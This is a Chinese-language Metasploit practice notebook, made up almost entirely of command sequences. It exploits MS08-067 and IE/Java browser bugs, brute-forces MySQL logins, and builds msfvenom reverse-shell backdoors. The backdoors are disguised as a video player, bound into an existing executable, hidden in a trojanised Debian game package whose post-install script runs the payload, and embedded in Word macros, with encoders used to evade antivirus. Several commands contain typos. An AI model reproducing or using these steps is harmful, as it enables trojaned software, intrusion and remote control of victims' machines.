metasploit练习
复现ms08_067_netapi
使用模块
msf5 > use exploit/windows/smb/ms08_067_netapi
查看配置
msf5 exploit(windows/smb/ms08_067_netapi) > show options
配置目标地址
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.19.132
查看target
配置target
msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
检查配置
msf5 exploit(windows/smb/ms08_067_netapi) > show options
开始攻击
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
攻击成功
-------------------------------分割线-------------------------------------
auxiliary/scanner/mysql/mysql_login
msf5 auxiliary(scanner/mysql/mysql_login) > show options
msf5 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.19.180
msf5 auxiliary(scanner/mysql/mysql_login) > set username root
msf5 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true
msf5 auxiliary(scanner/mysql/mysql_login) > show options
msf5 auxiliary(scanner/mysql/mysql_login) > run
------------------------------------分割线----------------------------------------
制作后门软件
msfvenom –a x86 –platform windows –p windows/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=7777 –b “\x00” –e x86/shikta_ga_nai –I 10 –f exe –o /var/www/html/西瓜影音.exe
参数说明:
-a 指定架构 x86 x64
-platform 指定平台
-p 指定payload
LHOST 目标主机执行程序后连接我们kali的地址
LPORT 目标主机执行程序后连接我的kali的端口
-b 去掉坏字符、坏字符影响payload的正常执行
-e 指定编码器也就是所谓的免杀
-i 指定payload有效载荷编码次数
-f指定输出格式
-o 指定允许名称和导出位置
msfconsole
use exploit/multi/handler 打开监听
show options
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.44.128
set LPORT 7777
exploit
systemctl start apache2
background 保存会话退出
sessions 查看会话
sessions –i 3 使用会话
给软件加后门
思路:先查看主程序会调用哪些附加的小程序,然后把payload后门和这些小程序绑定到一起。当然也可以直接加到主程序上,但是加主程序上容易报错。
msfvenom –a x86 –platform windows –p windows/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=8888 –b “\x00” –e x86/shikata_ga_nai –I 10 –x QvodTerminal.exe –f exe –o /var/www/html/QvodTerminal.exe
-x 绑定到当前目录下的软件上
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.44.128
set LPORT 8888
jobs
exploit
jobs –k 退出
制作Linux恶意软件获取shell
使用msfvenom生成Linux可执行文件
msfvenom –a x64 --platform linux –p linux/x64/shell/reverse_tcp LHOST=192.168.44.128 LPORT=9999-b “\x00” –i 10 –f elf –o /var/www/html/xuezha
参数和生成Windows的差不多
--platform 指定linux
-f 指定elf即linux下的可执行文件类型
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.44.128
set LPORT 9998
exploit
制作linux下的恶意软件包
apt –download-only install freesweep 仅下载文件包
ls /var/cache/apt/freesweep_1.0.1-1_amd64.deb 查看下载后的文件
若是碰到apt锁定:
ps –aux | grep apt 查看进程
kill -9 2303 杀死进程
dpkg –x freesweep_1.0.1_amd64.deb free 解压源文件
msfvenom –a x64 –platform linux –p linux/x64/shell/reverse_tcp LHOST=192.168.44.128 LPORT=9997 –b “\x00” –i 10 –f elf –o /root/free/usr/games/freesweep_scores
mkdir free/DEBIAN && cd free/DEBIAN
vim /root/free/DEBIAN/contro 创建软件包信息
Package: freesweep
Version: 1.0.1-1
Section: Game and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (Ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display – in Linux consle, in an xterm, and in
most text-based terminals currently in use.
tee /root/free/control << ‘EOF’ 追加
EOF 结尾
tee /root/free/DEBIAN/postinst << ‘EOF’ 安装后脚本
#!/bin/bash
sudo chmod 2755 /user/games/freesweep_scores
sudo /usr/games/freesweep_scores &
EOF
chmod +755 /root/free/DEBAIN/postinst 加权限
dpkg-deb –bulid /root/free 打包
ls free.deb
dpkg –i free.deb 安装
use exploit/multi/handler
set payload linux/x64/mwterpreter/reverse_tcp
set LHOST 192.168.44.128
set LPORT 8889
exploit
利用XP系统的IE浏览器漏洞获取shell
ms14_064_ole
官方链接:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2014/ms14-064
Windos OLE 中的漏洞可允许远程执行代码
use exploit/windows/browser/ms14_064_ole_code_execution
show options
show targets 对谁攻击
set payload windows/meterpreter/revese_tcp
set LHOST 192.168.44.128
run
rexploit 重新加载模块
基于java环境的漏洞利用获取shell
use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/revese_tcp
set LHOST 192.168.44.128
set targets 1
set AllowPowershellPrompt true 以管理员身份执行
set TRYUAC true
exploit
利用版本jre6/7/8
use exploit/multi/browser/java_jre17_driver_manager
show payloads
set LHOST 192.168.44.128
set payload java/meterpreter/http
run
利用宏感染word文档获取shell
生成宏代码
msfvenom –a x86 –platform windows –p windows/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=7777 –e x86/shikata_nai –i 10 –f vba-exe
复制生成的宏代码中sub 。。。。。end sub 到文档的宏中。后面payload date 复制到文档中
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.44.128
set LPORT 4444
exploit
-----------------------------------------------------------分割线-----------------------------------------------------------------